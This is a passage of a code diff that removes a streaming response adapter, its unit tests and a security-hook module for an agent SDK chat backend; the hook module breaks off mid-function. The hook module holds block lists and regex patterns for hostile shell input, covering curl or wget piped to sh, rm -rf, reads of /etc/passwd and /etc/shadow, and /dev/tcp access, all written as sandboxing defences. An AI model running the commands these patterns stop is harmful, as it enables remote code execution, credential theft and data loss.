responses.append(StreamFinish())
|
|
||||||
|
|
||||||
else:
|
|
||||||
logger.debug(f"Unhandled SDK message type: {type(sdk_message).__name__}")
|
|
||||||
|
|
||||||
return responses
|
|
||||||
|
|
||||||
def _ensure_text_started(self, responses: list[StreamBaseResponse]) -> None:
|
|
||||||
"""Start (or restart) a text block if needed."""
|
|
||||||
if not self.has_started_text or self.has_ended_text:
|
|
||||||
if self.has_ended_text:
|
|
||||||
self.text_block_id = str(uuid.uuid4())
|
|
||||||
self.has_ended_text = False
|
|
||||||
responses.append(StreamTextStart(id=self.text_block_id))
|
|
||||||
self.has_started_text = True
|
|
||||||
|
|
||||||
def _end_text_if_open(self, responses: list[StreamBaseResponse]) -> None:
|
|
||||||
"""End the current text block if one is open."""
|
|
||||||
if self.has_started_text and not self.has_ended_text:
|
|
||||||
responses.append(StreamTextEnd(id=self.text_block_id))
|
|
||||||
self.has_ended_text = True
|
|
||||||
|
|
||||||
|
|
||||||
def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
|
|
||||||
"""Extract a string output from a ToolResultBlock's content field."""
|
|
||||||
if isinstance(content, str):
|
|
||||||
return content
|
|
||||||
if isinstance(content, list):
|
|
||||||
parts = [item.get("text", "") for item in content if item.get("type") == "text"]
|
|
||||||
if parts:
|
|
||||||
return "".join(parts)
|
|
||||||
try:
|
|
||||||
return json.dumps(content)
|
|
||||||
except (TypeError, ValueError):
|
|
||||||
return str(content)
|
|
||||||
if content is None:
|
|
||||||
return ""
|
|
||||||
try:
|
|
||||||
return json.dumps(content)
|
|
||||||
except (TypeError, ValueError):
|
|
||||||
return str(content)
|
|
||||||
@@ -1,366 +0,0 @@
|
|||||||
"""Unit tests for the SDK response adapter."""
|
|
||||||
|
|
||||||
from claude_agent_sdk import (
|
|
||||||
AssistantMessage,
|
|
||||||
ResultMessage,
|
|
||||||
SystemMessage,
|
|
||||||
TextBlock,
|
|
||||||
ToolResultBlock,
|
|
||||||
ToolUseBlock,
|
|
||||||
UserMessage,
|
|
||||||
)
|
|
||||||
|
|
||||||
from backend.api.features.chat.response_model import (
|
|
||||||
StreamBaseResponse,
|
|
||||||
StreamError,
|
|
||||||
StreamFinish,
|
|
||||||
StreamFinishStep,
|
|
||||||
StreamStart,
|
|
||||||
StreamStartStep,
|
|
||||||
StreamTextDelta,
|
|
||||||
StreamTextEnd,
|
|
||||||
StreamTextStart,
|
|
||||||
StreamToolInputAvailable,
|
|
||||||
StreamToolInputStart,
|
|
||||||
StreamToolOutputAvailable,
|
|
||||||
)
|
|
||||||
|
|
||||||
from .response_adapter import SDKResponseAdapter
|
|
||||||
from .tool_adapter import MCP_TOOL_PREFIX
|
|
||||||
|
|
||||||
|
|
||||||
def _adapter() -> SDKResponseAdapter:
|
|
||||||
a = SDKResponseAdapter(message_id="msg-1")
|
|
||||||
a.set_task_id("task-1")
|
|
||||||
return a
|
|
||||||
|
|
||||||
|
|
||||||
# -- SystemMessage -----------------------------------------------------------
|
|
||||||
|
|
||||||
|
|
||||||
def test_system_init_emits_start_and_step():
|
|
||||||
adapter = _adapter()
|
|
||||||
results = adapter.convert_message(SystemMessage(subtype="init", data={}))
|
|
||||||
assert len(results) == 2
|
|
||||||
assert isinstance(results[0], StreamStart)
|
|
||||||
assert results[0].messageId == "msg-1"
|
|
||||||
assert results[0].taskId == "task-1"
|
|
||||||
assert isinstance(results[1], StreamStartStep)
|
|
||||||
|
|
||||||
|
|
||||||
def test_system_non_init_emits_nothing():
|
|
||||||
adapter = _adapter()
|
|
||||||
results = adapter.convert_message(SystemMessage(subtype="other", data={}))
|
|
||||||
assert results == []
|
|
||||||
|
|
||||||
|
|
||||||
# -- AssistantMessage with TextBlock -----------------------------------------
|
|
||||||
|
|
||||||
|
|
||||||
def test_text_block_emits_step_start_and_delta():
|
|
||||||
adapter = _adapter()
|
|
||||||
msg = AssistantMessage(content=[TextBlock(text="hello")], model="test")
|
|
||||||
results = adapter.convert_message(msg)
|
|
||||||
assert len(results) == 3
|
|
||||||
assert isinstance(results[0], StreamStartStep)
|
|
||||||
assert isinstance(results[1], StreamTextStart)
|
|
||||||
assert isinstance(results[2], StreamTextDelta)
|
|
||||||
assert results[2].delta == "hello"
|
|
||||||
|
|
||||||
|
|
||||||
def test_empty_text_block_emits_only_step():
|
|
||||||
adapter = _adapter()
|
|
||||||
msg = AssistantMessage(content=[TextBlock(text="")], model="test")
|
|
||||||
results = adapter.convert_message(msg)
|
|
||||||
# Empty text skipped, but step still opens
|
|
||||||
assert len(results) == 1
|
|
||||||
assert isinstance(results[0], StreamStartStep)
|
|
||||||
|
|
||||||
|
|
||||||
def test_multiple_text_deltas_reuse_block_id():
|
|
||||||
adapter = _adapter()
|
|
||||||
msg1 = AssistantMessage(content=[TextBlock(text="a")], model="test")
|
|
||||||
msg2 = AssistantMessage(content=[TextBlock(text="b")], model="test")
|
|
||||||
r1 = adapter.convert_message(msg1)
|
|
||||||
r2 = adapter.convert_message(msg2)
|
|
||||||
# First gets step+start+delta, second only delta (block & step already started)
|
|
||||||
assert len(r1) == 3
|
|
||||||
assert isinstance(r1[0], StreamStartStep)
|
|
||||||
assert isinstance(r1[1], StreamTextStart)
|
|
||||||
assert len(r2) == 1
|
|
||||||
assert isinstance(r2[0], StreamTextDelta)
|
|
||||||
assert r1[1].id == r2[0].id # same block ID
|
|
||||||
|
|
||||||
|
|
||||||
# -- AssistantMessage with ToolUseBlock --------------------------------------
|
|
||||||
|
|
||||||
|
|
||||||
def test_tool_use_emits_input_start_and_available():
|
|
||||||
"""Tool names arrive with MCP prefix and should be stripped for the frontend."""
|
|
||||||
adapter = _adapter()
|
|
||||||
msg = AssistantMessage(
|
|
||||||
content=[
|
|
||||||
ToolUseBlock(
|
|
||||||
id="tool-1",
|
|
||||||
name=f"{MCP_TOOL_PREFIX}find_agent",
|
|
||||||
input={"q": "x"},
|
|
||||||
)
|
|
||||||
],
|
|
||||||
model="test",
|
|
||||||
)
|
|
||||||
results = adapter.convert_message(msg)
|
|
||||||
assert len(results) == 3
|
|
||||||
assert isinstance(results[0], StreamStartStep)
|
|
||||||
assert isinstance(results[1], StreamToolInputStart)
|
|
||||||
assert results[1].toolCallId == "tool-1"
|
|
||||||
assert results[1].toolName == "find_agent" # prefix stripped
|
|
||||||
assert isinstance(results[2], StreamToolInputAvailable)
|
|
||||||
assert results[2].toolName == "find_agent" # prefix stripped
|
|
||||||
assert results[2].input == {"q": "x"}
|
|
||||||
|
|
||||||
|
|
||||||
def test_text_then_tool_ends_text_block():
|
|
||||||
adapter = _adapter()
|
|
||||||
text_msg = AssistantMessage(content=[TextBlock(text="thinking...")], model="test")
|
|
||||||
tool_msg = AssistantMessage(
|
|
||||||
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
|
|
||||||
model="test",
|
|
||||||
)
|
|
||||||
adapter.convert_message(text_msg) # opens step + text
|
|
||||||
results = adapter.convert_message(tool_msg)
|
|
||||||
# Step already open, so: TextEnd, ToolInputStart, ToolInputAvailable
|
|
||||||
assert len(results) == 3
|
|
||||||
assert isinstance(results[0], StreamTextEnd)
|
|
||||||
assert isinstance(results[1], StreamToolInputStart)
|
|
||||||
|
|
||||||
|
|
||||||
# -- UserMessage with ToolResultBlock ----------------------------------------
|
|
||||||
|
|
||||||
|
|
||||||
def test_tool_result_emits_output_and_finish_step():
|
|
||||||
adapter = _adapter()
|
|
||||||
# First register the tool call (opens step) — SDK sends prefixed name
|
|
||||||
tool_msg = AssistantMessage(
|
|
||||||
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}find_agent", input={})],
|
|
||||||
model="test",
|
|
||||||
)
|
|
||||||
adapter.convert_message(tool_msg)
|
|
||||||
|
|
||||||
# Now send tool result
|
|
||||||
result_msg = UserMessage(
|
|
||||||
content=[ToolResultBlock(tool_use_id="t1", content="found 3 agents")]
|
|
||||||
)
|
|
||||||
results = adapter.convert_message(result_msg)
|
|
||||||
assert len(results) == 2
|
|
||||||
assert isinstance(results[0], StreamToolOutputAvailable)
|
|
||||||
assert results[0].toolCallId == "t1"
|
|
||||||
assert results[0].toolName == "find_agent" # prefix stripped
|
|
||||||
assert results[0].output == "found 3 agents"
|
|
||||||
assert results[0].success is True
|
|
||||||
assert isinstance(results[1], StreamFinishStep)
|
|
||||||
|
|
||||||
|
|
||||||
def test_tool_result_error():
|
|
||||||
adapter = _adapter()
|
|
||||||
adapter.convert_message(
|
|
||||||
AssistantMessage(
|
|
||||||
content=[
|
|
||||||
ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}run_agent", input={})
|
|
||||||
],
|
|
||||||
model="test",
|
|
||||||
)
|
|
||||||
)
|
|
||||||
result_msg = UserMessage(
|
|
||||||
content=[ToolResultBlock(tool_use_id="t1", content="timeout", is_error=True)]
|
|
||||||
)
|
|
||||||
results = adapter.convert_message(result_msg)
|
|
||||||
assert isinstance(results[0], StreamToolOutputAvailable)
|
|
||||||
assert results[0].success is False
|
|
||||||
assert isinstance(results[1], StreamFinishStep)
|
|
||||||
|
|
||||||
|
|
||||||
def test_tool_result_list_content():
|
|
||||||
adapter = _adapter()
|
|
||||||
adapter.convert_message(
|
|
||||||
AssistantMessage(
|
|
||||||
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
|
|
||||||
model="test",
|
|
||||||
)
|
|
||||||
)
|
|
||||||
result_msg = UserMessage(
|
|
||||||
content=[
|
|
||||||
ToolResultBlock(
|
|
||||||
tool_use_id="t1",
|
|
||||||
content=[
|
|
||||||
{"type": "text", "text": "line1"},
|
|
||||||
{"type": "text", "text": "line2"},
|
|
||||||
],
|
|
||||||
)
|
|
||||||
]
|
|
||||||
)
|
|
||||||
results = adapter.convert_message(result_msg)
|
|
||||||
assert isinstance(results[0], StreamToolOutputAvailable)
|
|
||||||
assert results[0].output == "line1line2"
|
|
||||||
assert isinstance(results[1], StreamFinishStep)
|
|
||||||
|
|
||||||
|
|
||||||
def test_string_user_message_ignored():
|
|
||||||
"""A plain string UserMessage (not tool results) produces no output."""
|
|
||||||
adapter = _adapter()
|
|
||||||
results = adapter.convert_message(UserMessage(content="hello"))
|
|
||||||
assert results == []
|
|
||||||
|
|
||||||
|
|
||||||
# -- ResultMessage -----------------------------------------------------------
|
|
||||||
|
|
||||||
|
|
||||||
def test_result_success_emits_finish_step_and_finish():
|
|
||||||
adapter = _adapter()
|
|
||||||
# Start some text first (opens step)
|
|
||||||
adapter.convert_message(
|
|
||||||
AssistantMessage(content=[TextBlock(text="done")], model="test")
|
|
||||||
)
|
|
||||||
msg = ResultMessage(
|
|
||||||
subtype="success",
|
|
||||||
duration_ms=100,
|
|
||||||
duration_api_ms=50,
|
|
||||||
is_error=False,
|
|
||||||
num_turns=1,
|
|
||||||
session_id="s1",
|
|
||||||
)
|
|
||||||
results = adapter.convert_message(msg)
|
|
||||||
# TextEnd + FinishStep + StreamFinish
|
|
||||||
assert len(results) == 3
|
|
||||||
assert isinstance(results[0], StreamTextEnd)
|
|
||||||
assert isinstance(results[1], StreamFinishStep)
|
|
||||||
assert isinstance(results[2], StreamFinish)
|
|
||||||
|
|
||||||
|
|
||||||
def test_result_error_emits_error_and_finish():
|
|
||||||
adapter = _adapter()
|
|
||||||
msg = ResultMessage(
|
|
||||||
subtype="error",
|
|
||||||
duration_ms=100,
|
|
||||||
duration_api_ms=50,
|
|
||||||
is_error=True,
|
|
||||||
num_turns=0,
|
|
||||||
session_id="s1",
|
|
||||||
result="API rate limited",
|
|
||||||
)
|
|
||||||
results = adapter.convert_message(msg)
|
|
||||||
# No step was open, so no FinishStep — just Error + Finish
|
|
||||||
assert len(results) == 2
|
|
||||||
assert isinstance(results[0], StreamError)
|
|
||||||
assert "API rate limited" in results[0].errorText
|
|
||||||
assert isinstance(results[1], StreamFinish)
|
|
||||||
|
|
||||||
|
|
||||||
# -- Text after tools (new block ID) ----------------------------------------
|
|
||||||
|
|
||||||
|
|
||||||
def test_text_after_tool_gets_new_block_id():
|
|
||||||
adapter = _adapter()
|
|
||||||
# Text -> Tool -> ToolResult -> Text should get a new text block ID and step
|
|
||||||
adapter.convert_message(
|
|
||||||
AssistantMessage(content=[TextBlock(text="before")], model="test")
|
|
||||||
)
|
|
||||||
adapter.convert_message(
|
|
||||||
AssistantMessage(
|
|
||||||
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
|
|
||||||
model="test",
|
|
||||||
)
|
|
||||||
)
|
|
||||||
# Send tool result (closes step)
|
|
||||||
adapter.convert_message(
|
|
||||||
UserMessage(content=[ToolResultBlock(tool_use_id="t1", content="ok")])
|
|
||||||
)
|
|
||||||
results = adapter.convert_message(
|
|
||||||
AssistantMessage(content=[TextBlock(text="after")], model="test")
|
|
||||||
)
|
|
||||||
# Should get StreamStartStep (new step) + StreamTextStart (new block) + StreamTextDelta
|
|
||||||
assert len(results) == 3
|
|
||||||
assert isinstance(results[0], StreamStartStep)
|
|
||||||
assert isinstance(results[1], StreamTextStart)
|
|
||||||
assert isinstance(results[2], StreamTextDelta)
|
|
||||||
assert results[2].delta == "after"
|
|
||||||
|
|
||||||
|
|
||||||
# -- Full conversation flow --------------------------------------------------
|
|
||||||
|
|
||||||
|
|
||||||
def test_full_conversation_flow():
|
|
||||||
"""Simulate a complete conversation: init -> text -> tool -> result -> text -> finish."""
|
|
||||||
adapter = _adapter()
|
|
||||||
all_responses: list[StreamBaseResponse] = []
|
|
||||||
|
|
||||||
# 1. Init
|
|
||||||
all_responses.extend(
|
|
||||||
adapter.convert_message(SystemMessage(subtype="init", data={}))
|
|
||||||
)
|
|
||||||
# 2. Assistant text
|
|
||||||
all_responses.extend(
|
|
||||||
adapter.convert_message(
|
|
||||||
AssistantMessage(content=[TextBlock(text="Let me search")], model="test")
|
|
||||||
)
|
|
||||||
)
|
|
||||||
# 3. Tool use
|
|
||||||
all_responses.extend(
|
|
||||||
adapter.convert_message(
|
|
||||||
AssistantMessage(
|
|
||||||
content=[
|
|
||||||
ToolUseBlock(
|
|
||||||
id="t1",
|
|
||||||
name=f"{MCP_TOOL_PREFIX}find_agent",
|
|
||||||
input={"query": "email"},
|
|
||||||
)
|
|
||||||
],
|
|
||||||
model="test",
|
|
||||||
)
|
|
||||||
)
|
|
||||||
)
|
|
||||||
# 4. Tool result
|
|
||||||
all_responses.extend(
|
|
||||||
adapter.convert_message(
|
|
||||||
UserMessage(
|
|
||||||
content=[ToolResultBlock(tool_use_id="t1", content="Found 2 agents")]
|
|
||||||
)
|
|
||||||
)
|
|
||||||
)
|
|
||||||
# 5. More text
|
|
||||||
all_responses.extend(
|
|
||||||
adapter.convert_message(
|
|
||||||
AssistantMessage(content=[TextBlock(text="I found 2")], model="test")
|
|
||||||
)
|
|
||||||
)
|
|
||||||
# 6. Result
|
|
||||||
all_responses.extend(
|
|
||||||
adapter.convert_message(
|
|
||||||
ResultMessage(
|
|
||||||
subtype="success",
|
|
||||||
duration_ms=500,
|
|
||||||
duration_api_ms=400,
|
|
||||||
is_error=False,
|
|
||||||
num_turns=2,
|
|
||||||
session_id="s1",
|
|
||||||
)
|
|
||||||
)
|
|
||||||
)
|
|
||||||
|
|
||||||
types = [type(r).__name__ for r in all_responses]
|
|
||||||
assert types == [
|
|
||||||
"StreamStart",
|
|
||||||
"StreamStartStep", # step 1: text + tool call
|
|
||||||
"StreamTextStart",
|
|
||||||
"StreamTextDelta", # "Let me search"
|
|
||||||
"StreamTextEnd", # closed before tool
|
|
||||||
"StreamToolInputStart",
|
|
||||||
"StreamToolInputAvailable",
|
|
||||||
"StreamToolOutputAvailable", # tool result
|
|
||||||
"StreamFinishStep", # step 1 closed after tool result
|
|
||||||
"StreamStartStep", # step 2: continuation text
|
|
||||||
"StreamTextStart", # new block after tool
|
|
||||||
"StreamTextDelta", # "I found 2"
|
|
||||||
"StreamTextEnd", # closed by result
|
|
||||||
"StreamFinishStep", # step 2 closed
|
|
||||||
"StreamFinish",
|
|
||||||
]
|
|
||||||
@@ -1,393 +0,0 @@
|
|||||||
"""Security hooks for Claude Agent SDK integration.
|
|
||||||
|
|
||||||
This module provides security hooks that validate tool calls before execution,
|
|
||||||
ensuring multi-user isolation and preventing unauthorized operations.
|
|
||||||
"""
|
|
||||||
|
|
||||||
import json
|
|
||||||
import logging
|
|
||||||
import os
|
|
||||||
import re
|
|
||||||
import shlex
|
|
||||||
from typing import Any, cast
|
|
||||||
|
|
||||||
from backend.api.features.chat.sdk.tool_adapter import MCP_TOOL_PREFIX
|
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
|
||||||
|
|
||||||
# Tools that are blocked entirely (CLI/system access)
|
|
||||||
BLOCKED_TOOLS = {
|
|
||||||
"bash",
|
|
||||||
"shell",
|
|
||||||
"exec",
|
|
||||||
"terminal",
|
|
||||||
"command",
|
|
||||||
}
|
|
||||||
|
|
||||||
# Safe read-only commands allowed in the sandboxed Bash tool.
|
|
||||||
# These are data-processing / inspection utilities — no writes, no network.
|
|
||||||
ALLOWED_BASH_COMMANDS = {
|
|
||||||
# JSON / structured data
|
|
||||||
"jq",
|
|
||||||
# Text processing
|
|
||||||
"grep",
|
|
||||||
"egrep",
|
|
||||||
"fgrep",
|
|
||||||
"rg",
|
|
||||||
"head",
|
|
||||||
"tail",
|
|
||||||
"cat",
|
|
||||||
"wc",
|
|
||||||
"sort",
|
|
||||||
"uniq",
|
|
||||||
"cut",
|
|
||||||
"tr",
|
|
||||||
"sed",
|
|
||||||
"awk",
|
|
||||||
"column",
|
|
||||||
"fold",
|
|
||||||
"fmt",
|
|
||||||
"nl",
|
|
||||||
"paste",
|
|
||||||
"rev",
|
|
||||||
# File inspection (read-only)
|
|
||||||
"find",
|
|
||||||
"ls",
|
|
||||||
"file",
|
|
||||||
"stat",
|
|
||||||
"du",
|
|
||||||
"tree",
|
|
||||||
"basename",
|
|
||||||
"dirname",
|
|
||||||
"realpath",
|
|
||||||
# Utilities
|
|
||||||
"echo",
|
|
||||||
"printf",
|
|
||||||
"date",
|
|
||||||
"true",
|
|
||||||
"false",
|
|
||||||
"xargs",
|
|
||||||
"tee",
|
|
||||||
# Comparison / encoding
|
|
||||||
"diff",
|
|
||||||
"comm",
|
|
||||||
"base64",
|
|
||||||
"md5sum",
|
|
||||||
"sha256sum",
|
|
||||||
}
|
|
||||||
|
|
||||||
# Tools allowed only when their path argument stays within the SDK workspace.
|
|
||||||
# The SDK uses these to handle oversized tool results (writes to tool-results/
|
|
||||||
# files, then reads them back) and for workspace file operations.
|
|
||||||
WORKSPACE_SCOPED_TOOLS = {"Read", "Write", "Edit", "Glob", "Grep"}
|
|
||||||
|
|
||||||
# Tools that get sandboxed Bash validation (command allowlist + workspace paths).
|
|
||||||
SANDBOXED_BASH_TOOLS = {"Bash"}
|
|
||||||
|
|
||||||
# Dangerous patterns in tool inputs
|
|
||||||
DANGEROUS_PATTERNS = [
|
|
||||||
r"sudo",
|
|
||||||
r"rm\s+-rf",
|
|
||||||
r"dd\s+if=",
|
|
||||||
r"/etc/passwd",
|
|
||||||
r"/etc/shadow",
|
|
||||||
r"chmod\s+777",
|
|
||||||
r"curl\s+.*\|.*sh",
|
|
||||||
r"wget\s+.*\|.*sh",
|
|
||||||
r"eval\s*\(",
|
|
||||||
r"exec\s*\(",
|
|
||||||
r"__import__",
|
|
||||||
r"os\.system",
|
|
||||||
r"subprocess",
|
|
||||||
]
|
|
||||||
|
|
||||||
|
|
||||||
def _deny(reason: str) -> dict[str, Any]:
|
|
||||||
"""Return a hook denial response."""
|
|
||||||
return {
|
|
||||||
"hookSpecificOutput": {
|
|
||||||
"hookEventName": "PreToolUse",
|
|
||||||
"permissionDecision": "deny",
|
|
||||||
"permissionDecisionReason": reason,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
def _validate_workspace_path(
|
|
||||||
tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None
|
|
||||||
) -> dict[str, Any]:
|
|
||||||
"""Validate that a workspace-scoped tool only accesses allowed paths.
|
|
||||||
|
|
||||||
Allowed directories:
|
|
||||||
- The SDK working directory (``/tmp/copilot-<session>/``)
|
|
||||||
- The SDK tool-results directory (``~/.claude/projects/…/tool-results/``)
|
|
||||||
"""
|
|
||||||
path = tool_input.get("file_path") or tool_input.get("path") or ""
|
|
||||||
if not path:
|
|
||||||
# Glob/Grep without a path default to cwd which is already sandboxed
|
|
||||||
return {}
|
|
||||||
|
|
||||||
resolved = os.path.normpath(os.path.expanduser(path))
|
|
||||||
|
|
||||||
# Allow access within the SDK working directory
|
|
||||||
if sdk_cwd:
|
|
||||||
norm_cwd = os.path.normpath(sdk_cwd)
|
|
||||||
if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
|
|
||||||
return {}
|
|
||||||
|
|
||||||
# Allow access to ~/.claude/projects/*/tool-results/ (big tool results)
|
|
||||||
claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
|
|
||||||
if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
|
|
||||||
return {}
|
|
||||||
|
|
||||||
logger.warning(
|
|
||||||
f"Blocked {tool_name} outside workspace: {path} (resolved={resolved})"
|
|
||||||
)
|
|
||||||
return _deny(
|
|
||||||
f"Tool '{tool_name}' can only access files within the workspace directory."
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
def _validate_bash_command(
|
|
||||||
tool_input: dict[str, Any], sdk_cwd: str | None
|
|
||||||
) -> dict[str, Any]:
|
|
||||||
"""Validate a Bash command against the allowlist of safe commands.
|
|
||||||
|
|
||||||
Only read-only data-processing commands are allowed (jq, grep, head, etc.).
|
|
||||||
Blocks command substitution, output redirection, and disallowed executables.
|
|
||||||
|
|
||||||
Uses ``shlex.split`` to properly handle quoted strings (e.g. jq filters
|
|
||||||
containing ``|`` won't be mistaken for shell pipes).
|
|
||||||
"""
|
|
||||||
command = tool_input.get("command", "")
|
|
||||||
if not command or not isinstance(command, str):
|
|
||||||
return _deny("Bash command is empty.")
|
|
||||||
|
|
||||||
# Block command substitution — can smuggle arbitrary commands
|
|
||||||
if "$(" in command or "`" in command:
|
|
||||||
return _deny("Command substitution ($() or ``) is not allowed in Bash.")
|
|
||||||
|
|
||||||
# Block output redirection — Bash should be read-only
|
|
||||||
if re.search(r"(?<!\d)>{1,2}\s", command):
|
|
||||||
return _deny("Output redirection (> or >>) is not allowed in Bash.")
|
|
||||||
|
|
||||||
# Block /dev/ access (e.g., /dev/tcp for network)
|
|
||||||
if "/dev/" in command:
|
|
||||||
return _deny("Access to /dev/ is not allowed in Bash.")
|
|
||||||
|
|
||||||
# Tokenize with shlex (respects quotes), then extract command names.
|
|
||||||
# shlex preserves shell operators like | ; && || as separate tokens.
|
|
||||||
try:
|
|
||||||
tokens = shlex.split(command)
|
|
||||||
except ValueError:
|
|
||||||
return _deny("Malformed command (unmatched quotes).")
|
|
||||||
|
|
||||||
# Walk tokens: the first non-assignment token after a pipe/separator is a command.
|
|
||||||
expect_command = True
|
|
||||||
for token in tokens:
|
|
||||||
if token in ("|", "||", "&&", ";"):
|
|
||||||
expect_command = True
|
|
||||||
continue
|
|
||||||
if expect_command:
|
|
||||||
# Skip env var assignments (VAR=value)
|
|
||||||
if "=" in token and not token.startswith("-"):
|
|
||||||
continue
|
|
||||||
cmd_name = os.path.basename(token)
|
|
||||||
if cmd_name not in ALLOWED_BASH_COMMANDS:
|
|
||||||
allowed = ", ".join(sorted(ALLOWED_BASH_COMMANDS))
|
|
||||||
logger.warning(f"Blocked Bash command: {cmd_name}")
|
|
||||||
return _deny(
|
|
||||||
f"Command '{cmd_name}' is not allowed. "
|
|
||||||
f"Allowed commands: {allowed}"
|
|
||||||
)
|
|
||||||
expect_command = False
|
|
||||||
|
|
||||||
# Validate absolute file paths stay within workspace
|
|
||||||
if sdk_cwd:
|
|
||||||
norm_cwd = os.path.normpath(sdk_cwd)
|
|
||||||
claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
|
|
||||||
for token in tokens:
|
|
||||||
if not token.startswith("/"):
|
|
||||||
continue
|
|
||||||
resolved = os.path.normpath(token)
|
|
||||||
if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
|
|
||||||
continue
|
|
||||||
if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
|
|
||||||
continue
|
|
||||||
logger.warning(f"Blocked Bash path outside workspace: {token}")
|
|
||||||
return _deny(
|
|
||||||
f"Bash can only access files within the workspace directory. "
|
|
||||||
f"Path '{token}' is outside the workspace."
|
|
||||||
)
|
|
||||||
|
|
||||||
return {}
|
|
||||||
|
|
||||||
|
|
||||||
def _validate_tool_access(
|
|
||||||
tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None = None
|
|
||||||
) -> dict[str, Any]:
|
|
||||||
"""Validate that a tool call is allowed.
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Empty dict to allow, or dict with hookSpecificOutput to deny
|
|
||||||
"""
|
|
||||||
# Block forbidden tools
|
|
||||||
if tool_name in BLOCKED_TOOLS:
|
|
||||||
logger.warning(f"Blocked tool access attempt: {tool_name}")
|
|
||||||
return _deny(
|
|
||||||
f"Tool '{tool_name}' is not available. "
|
|
||||||
"Use the CoPilot-specific tools instead."
|
|
||||||
)
|
|
||||||
|
|
||||||
# Sandboxed Bash: only allowlisted commands, workspace-scoped paths
|
|
||||||
if tool_name in SANDBOXED_BASH_TOOLS:
|
|
||||||
return _validate_bash_command(tool_input, sdk_cwd)
|
|
||||||
|
|
||||||
# Workspace-scoped tools: allowed only within the SDK workspace directory
|
|
||||||
if tool_name in WORKSPACE_SCOPED_TOOLS:
|
|
||||||
return _validate_workspace_path(tool_name, tool_input, sdk_cwd)
|
|
||||||
|
|
||||||
# Check for dangerous patterns in tool input
|
|
||||||
# Use json.dumps for predictable format (str() produces Python repr)
|
|
||||||
input_str = json.dumps(tool_input) if tool_input else ""
|
|
||||||
|
|
||||||
for pattern in DANGEROUS_PATTERNS:
|
|
||||||
if re.search(pattern, input_str, re.IGNORECASE):
|
|
||||||
logger.warning(
|
|
||||||
f"Blocked dangerous pattern in tool input: {pattern} in {tool_name}"
|
|
||||||
)
|
|
||||||
return _deny("Input contains blocked pattern")
|
|
||||||
|
|
||||||
return {}
|
|
||||||
|
|
||||||
|
|
||||||
def _validate_user_isolation(
|
|
||||||
tool_name: str, tool_input: dict[str, Any], user_id: str | None
|
|
||||||
) -> dict[str, Any]:
|
|
||||||
"""Validate that tool calls respect user isolation."""
|
|
||||||
# For workspace file tools, ensure path doesn't escape
|
|
||||||
if "workspace" in tool_name.lower():
|
|
||||||
path = tool_input.get("path", "") or tool_input.get("file_path", "")
|
|
||||||
if path:
|
|
||||||
# Check for path traversal
|
|
||||||
if ".." in path or path.startswith("/"):
|
|
||||||
logger.warning(
|
|
||||||
f"Blocked path traversal attempt: {path} by user {user_id}"
|
|
||||||
)
|
|
||||||
return {
|
|
||||||
"hookSpecificOutput": {
|
|
||||||
"hookEventName": "PreToolUse",
|
|
||||||
"permissionDecision": "deny",
|
|
||||||
"permissionDecisionReason": "Path traversal not allowed",
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
return {}
|
|
||||||
|
|
||||||
|
|
||||||
def create_security_hooks(
|
|
||||||
user_id: str | None, sdk_cwd: str | None = None
|
|
||||||
) -> dict[str, Any]:
|
|
||||||
"""Create the security hooks configuration for Claude Agent SDK.
|
|
||||||
|
|
||||||
Includes security validation and observability hooks:
|
|
||||||
- PreToolUse: Security validation before tool execution
|
|
||||||
- PostToolUse: Log successful tool executions
|
|
||||||
- PostToolUseFailure: Log and handle failed tool executions
|
|
||||||
- PreCompact: Log context compaction events (SDK handles compaction automatically)
|
|
||||||
|
|
||||||
Args:
|
|
||||||
user_id: Current user ID for isolation validation
|
|
||||||
sdk_cwd: SDK working directory for workspace-scoped tool validation
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Hooks configuration dict for ClaudeAgentOptions
|
|
||||||
"""
|
|
||||||
try:
|
|
||||||
from claude_agent_sdk import HookMatcher
|
|
||||||
from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
|
|
||||||
|
|
||||||
async def pre_tool_use_hook(
|
|
||||||
input_data: HookInput,
|
|
||||||
tool_use_id: str | None,
|
|
||||||
context: HookContext,
|
|
||||||
) -> SyncHookJSONOutput:
|
|
||||||
"""Combined pre-tool-use validation hook."""
|
|
||||||
_ = context # unused but required by signature
|
|
||||||
tool_name = cast(str, input_data.get("tool_name", ""))
|
|
||||||
tool_input = cast(dict[str, Any], input_data.get("tool_input", {}))
|
|
||||||
|
|
||||||
# Strip MCP prefix for consistent validation
|
|
||||||
is_copilot_tool = tool_name.startswith(MCP_TOOL_PREFIX)
|
|
||||||
clean_name = tool_name.removeprefix(MCP_TOOL_PREFIX)
|
|
||||||
|
|
||||||
# Only block non-CoPilot tools; our MCP-registered tools
|
|
||||||
# (including Read for oversized results) are already sandboxed.
|
|
||||||
if not is_copilot_tool:
|
|
||||||
result = _validate_tool_access(clean_name, tool_input, sdk_cwd)
|
|
||||||
if result:
|
|
||||||
return cast(SyncHookJSONOutput, result)
|
|
||||||
|
|
||||||
# Validate user isolation
|
|
||||||
result = _validate_user_isolation(clean_name, tool_input, user_id)
|
|
||||||
if result:
|
|
||||||
return cast(SyncHookJSONOutput, result)
|
|
||||||
|
|
||||||
logger.debug(f"[SDK] Tool start: {tool_name}, user={user_id}")
|
|
||||||
return cast(SyncHookJSONOutput, {})
|
|
||||||
|
|
||||||
async def post_tool_use_hook(
|
|
||||||
input_data: HookInput,
|
|
||||||
